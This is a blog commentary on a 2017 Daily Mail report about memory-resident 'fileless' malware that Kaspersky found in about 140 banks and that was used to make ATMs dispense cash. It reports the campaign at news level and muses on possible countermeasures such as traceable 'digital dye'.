The ‘Invisible’ Malware That Allows Hackers To Remotely Control ATMs: Experts Warn Software Has Already Infected At Least 140 Banks In 40 Countries Around The World
Stacy Liberatore writes in the February 9, 2017 edition of the Daily Mail Online about a new technique/tool that cyber criminals are using to steal cash from automatic teller machines (ATMs) across the globe. The malware hides itself in the computer’s memory to avoid detection;” and, thus far, investigators haven’t been able to forensically pinpoint who is responsible for this wave of cyber theft. Kaspersky Lab, a cyber security firm based in Russia was the first company/entity to diagnose the hacking technique,” the Daily Mail noted. “The use of open source exploit code, common Windows utilities, and unknown domains makes it almost impossible to determine the group responsible — or, even whether it is a single group, or several groups sharing the same [hacking] tools,” and techniques. “The attack [hack], uses only legitimate software: widely available penetration-testing and administrator tools, as well as the PowerShell framework for task automation in Windows,” the Daily Mail reported. “Unlike most other attacks, it drops no malware files onto the hard drive; and instead — hides them in memory. This combined approach helps to avoid detection by white-listing technologies; and, leaves [cyber] forensic investigators with almost no artefacts [their spelling] [clues] or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot.
Ms. Liberatore writes that “the code hides in the memory, invisibly collecting the passwords of system administrators– so that the attackers [hackers can] could remotely control the victims systems.” “The ultimate goal appears to have been access to financial processes,’ Kaspersky said. “What’s interesting here, is that these attacks are ongoing globally, against the banks themselves,” Ksapersky Lab expert Kurt Baumgartner told the cyber security website, Ars Technica. “The banks have not been adequately prepared, in many cases, to deal with this,” Mr. Baumgartner added. “They are pushing money out of the banks, and from within the banks — by targeting computers that operate automatic teller machines (ATMs).”
Kaspersky Labs also determined that the invisible malware was “‘being injected into networks using the systems [the banks] own administrative and security tools,” Ms. Liberatore wrote. “Once installed, the malware disappears and renames itself when the computer is rebooted — allowing it to go undetected for months.”
“The determination of the hackers to hide their activity and make detection and incident response increasingly difficult, explains the latest trend of anti-forensic techniques and memory-based malware,” said Sergey Golovanov, Principal Researcher at Kapersky Lab. “This is why memory forensics is becoming critical to analysis of malware, and its functions. In these particular incidents used every conceivable, anti-forensic technique: demonstrating how no malware files are needed fir the successful exfiltration of data from a network; and, how the use of legitimate and open source utilities makes attribution almost impossible.” And, these attacks are still continuing, and are likely to continue to persist — unless and until either the culprits are identified, caught and arrested — not likely anytime soon — or, a new cyber intrusion tool/technique is developed that makes this kind of attack much more difficult to pull off and/or succeed.
This particular hack/attack has been identified in at least 40 countries, and has victimized at least 140 financial institutions and banks across the globe — though cyber security experts believe these numbers are likely lower than what is really occurring, or that has been reported. “The U.S., France, the U.K., Ecuador, and Kenya are the top five nations affected by the hack, with the U.S. being the hardest hit, with 21 incidents,” the Daily Mail reported.
It is too bad that we do not yet have a digital money version of the exploding dye of paper money. Using the banks own system administrator credentials and tools, makes this kind of cyber attack very clever, elegant, and hard to discover — at least in the early days and months. Indeed, of the 140 or so financial institutions and banks, the malicious malware used in these attacks had been in their networks for an average of at least six months before cyber forensic investigators were able to pinpoint the reason their ATMs were dispensing cash without proper authorization. Although not said, I would also guess that the cyber thieves hid, or attempted to hide the fact that they were stealing cash from these same institutions — by either taking the money in small amounts, and at times of peak use, in order to blend in with legitimate cash withdrawals. If we cannot devise digital dye, it might be useful to come up with some kind of digital tags that could perhaps be traced back to the original source of the illegitimate transaction. Or, is this an area where digital currency like Bitcoin could make carrying out these kinds of theft more difficult? I do not know and defer to those of you who understand this kind of hack; and, whether or not digital money such as Bitcoin would make this kind of attack much more difficult to do. Until then, the darker angels of our nature still have a strong position in this complex and sophisticated ‘game’ of digital ‘cat-and-mouse.’ V/R, RCP